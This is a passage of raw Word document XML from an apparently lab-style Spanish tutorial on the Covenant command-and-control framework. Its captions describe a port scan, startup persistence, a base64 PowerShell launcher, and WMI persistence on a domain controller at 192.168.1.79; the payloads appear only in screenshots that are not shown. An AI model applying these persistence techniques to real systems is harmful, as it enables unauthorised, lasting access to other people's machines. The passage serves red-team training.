    </w:p>
    <w:p w14:paraId="78003191" w14:textId="71B0C299" w:rsidR="00774F5A" w:rsidRDefault="001E0CA9" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25265308" wp14:editId="4A4C1FAA">
            <wp:extent cx="6419048" cy="4238095"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="1747808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08026" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId339">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6419048" cy="4238095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12218CF8" w14:textId="77777777" w:rsidR="00774F5A" w:rsidRDefault="00774F5A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599292C2" w14:textId="0A59BD7E" w:rsidR="00774F5A" w:rsidRDefault="00774F5A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Viendo su estado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F95B93" w14:textId="77777777" w:rsidR="00B87E6F" w:rsidRDefault="00B87E6F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D9361AA" w14:textId="5899E1DC" w:rsidR="00B87E6F" w:rsidRDefault="00B87E6F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora realizaré un escaneo de puertos, para eso tendremos que usar la Task  PortScan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECA2E59" w14:textId="77777777" w:rsidR="00B87E6F" w:rsidRDefault="00B87E6F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AC6C802" w14:textId="69814613" w:rsidR="00B87E6F" w:rsidRDefault="001E0CA9" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F6A4010" wp14:editId="4A2874A3">
            <wp:extent cx="6409524" cy="4523809"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="750787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87806" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId340">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6409524" cy="4523809"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C4540F" w14:textId="77777777" w:rsidR="00B87E6F" w:rsidRDefault="00B87E6F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72495606" w14:textId="1664455A" w:rsidR="00B87E6F" w:rsidRDefault="00B87E6F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Indicaremos la IP en este caso como es la IP de la </w:t>
      </w:r>
      <w:r w:rsidR="00E25D51">
        <w:t>máquina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> atacada pondremos 127.0.0.1, se podría desde esta escanear otra </w:t>
      </w:r>
      <w:r w:rsidR="00E25D51">
        <w:t>máquina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de la misma red solo habría que cambiar la IP por esa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F30E37E" w14:textId="77777777" w:rsidR="00B87E6F" w:rsidRDefault="00B87E6F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00632063" w14:textId="77777777" w:rsidR="00B87E6F" w:rsidRDefault="00B87E6F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6495A07E" w14:textId="77777777" w:rsidR="00B87E6F" w:rsidRDefault="00B87E6F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F7D3FDF" w14:textId="77777777" w:rsidR="00B87E6F" w:rsidRDefault="00B87E6F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="701DAC31" w14:textId="77777777" w:rsidR="00B87E6F" w:rsidRDefault="00B87E6F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37259181" w14:textId="74E2FE63" w:rsidR="00B87E6F" w:rsidRDefault="001E0CA9" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="434603D1" wp14:editId="700D5066">
            <wp:extent cx="6428571" cy="4438095"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1861047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7170" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId341">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6428571" cy="4438095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11402C14" w14:textId="77777777" w:rsidR="00B87E6F" w:rsidRDefault="00B87E6F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="110870F4" w14:textId="0BE1F0AC" w:rsidR="00875D14" w:rsidRDefault="00B87E6F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>En este ejemplo a mi máquina atacante</w:t>
      </w:r>
      <w:r w:rsidR="00875D14">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AF816B" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="709B17AB" w14:textId="055A3AD2" w:rsidR="008C5317" w:rsidRDefault="00B87E6F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Obteniendo estos resultados:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6ACAC4" w14:textId="7310A9E2" w:rsidR="00B87E6F" w:rsidRDefault="00875D14" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61524B05" wp14:editId="2D14EBD7">
            <wp:extent cx="6571429" cy="5714286"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1270"/>
            <wp:docPr id="1180983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3533" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId342">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6571429" cy="5714286"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="385BD427" w14:textId="4FA41B7E" w:rsidR="008C5317" w:rsidRDefault="008C5317" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F57EFF" w14:textId="71154D78" w:rsidR="009410A3" w:rsidRDefault="009410A3" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Por último crearemos persistencia mediante esta Task</w:t>
      </w:r>
      <w:r w:rsidR="00734BF9">
        <w:t>, PersistStartup</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C120BA5" w14:textId="77777777" w:rsidR="009410A3" w:rsidRDefault="009410A3" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C6E5A05" w14:textId="6954E1D5" w:rsidR="009410A3" w:rsidRDefault="000E533B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78688A4F" wp14:editId="2C0C6AC0">
            <wp:extent cx="6645910" cy="3347085"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1687685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85287" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId343">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248F8093" w14:textId="77777777" w:rsidR="008C5317" w:rsidRDefault="008C5317" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78D85DD3" w14:textId="3B97F883" w:rsidR="000E533B" w:rsidRDefault="000E533B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Lo que haré es generar un código de PowerShell para conectarme a Covenant ese código estará en base64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BD2BFC" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7610CE79" w14:textId="6D30CB2D" w:rsidR="008C5317" w:rsidRDefault="000E533B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03EF7670" wp14:editId="654CB48A">
            <wp:extent cx="6645910" cy="2772410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1348620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0897" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId344">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2772410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F9440F" w14:textId="77777777" w:rsidR="008C5317" w:rsidRDefault="008C5317" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D991240" w14:textId="27AB2A5C" w:rsidR="00AB503C" w:rsidRDefault="00AB503C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y aquí tenemos el bat en la máquina Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6577504E" w14:textId="77777777" w:rsidR="00AB503C" w:rsidRDefault="00AB503C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BF796D4" w14:textId="77777777" w:rsidR="00AB503C" w:rsidRDefault="00AB503C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DDB0A34" w14:textId="589C8916" w:rsidR="00AB503C" w:rsidRDefault="000E533B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0843FE51" wp14:editId="026FC435">
            <wp:extent cx="6645910" cy="2166620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1624200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0567" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId345">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2166620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE0FBE9" w14:textId="77777777" w:rsidR="00466375" w:rsidRDefault="00466375" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D6CCF96" w14:textId="022FA77C" w:rsidR="00466375" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora usaremos PersistVMI</w:t>
      </w:r>
      <w:r w:rsidR="00525C10">
        <w:t>, para este ejemplo usaré el controlador de dominio principal con IP 192.168.1.79:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4062F2C3" w14:textId="77777777" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="623E7C51" w14:textId="51CBB3F7" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EC3E5FF" wp14:editId="47ABBD66">
            <wp:extent cx="6645910" cy="6645910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="206367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3403" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId346">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0FB33264" w14:textId="77777777" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E12A288" w14:textId="0A3E36E7" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En la parte de </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF6E02">
        <w:t>EncodedCommand</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> colocaremos el exploit de Powershell generado por covenant:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46338E67" w14:textId="77777777" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48FC47B5" w14:textId="1E279487" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F79BAE8" wp14:editId="527CA3CD">
            <wp:extent cx="6645910" cy="6645910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="647957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7151" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId347">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55EE7DB1" w14:textId="77777777" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FA78A8D" w14:textId="0CC42B2D" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Quedando así, ahora le tendremos que dar a ejecutar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463F785D" w14:textId="77777777" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77F5365F" w14:textId="615C20F8" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2669C235" wp14:editId="1B749F4F">
            <wp:extent cx="6645910" cy="6645910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="52941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737" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId348">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041FA14B" w14:textId="77777777" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="336CE391" w14:textId="77777777" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C85F1FE" w14:textId="694D6D50" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EEB2E58" wp14:editId="5FE76151">
            <wp:extent cx="6645910" cy="5665470"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1530864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64635" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId349">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="5665470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13173D12" w14:textId="77777777" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61B8169F" w14:textId="45F1691D" w:rsidR="00BF6E02" w:rsidRDefault="00C5187D" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Consiguiendo la persistencia en el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79475270" w14:textId="77777777" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B463418" w14:textId="77777777" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41305CB8" w14:textId="4BD496B2" w:rsidR="00BF6E02" w:rsidRDefault="00630D23" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35A60C4C" wp14:editId="2B6CFE38">
            <wp:extent cx="6645910" cy="3027680"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="1359935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194" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId350">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="3027680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0199EE0A" w14:textId="77777777" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05855005" w14:textId="77777777" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DD8CC3A" w14:textId="77777777" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="166CE928" w14:textId="77777777" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11EB57FB" w14:textId="77777777" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D35D0BE" w14:textId="77777777" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02642A09" w14:textId="77777777" w:rsidR="00BF6E02" w:rsidRDefault="00BF6E02" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14E5FE77" w14:textId="77777777" w:rsidR="008C5317" w:rsidRDefault="008C5317" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F872835" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19D3CC7B" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CCB82C6" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72F8307B" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70441BE5" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13E5B294" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="246F2C45" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61BEC8C9" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
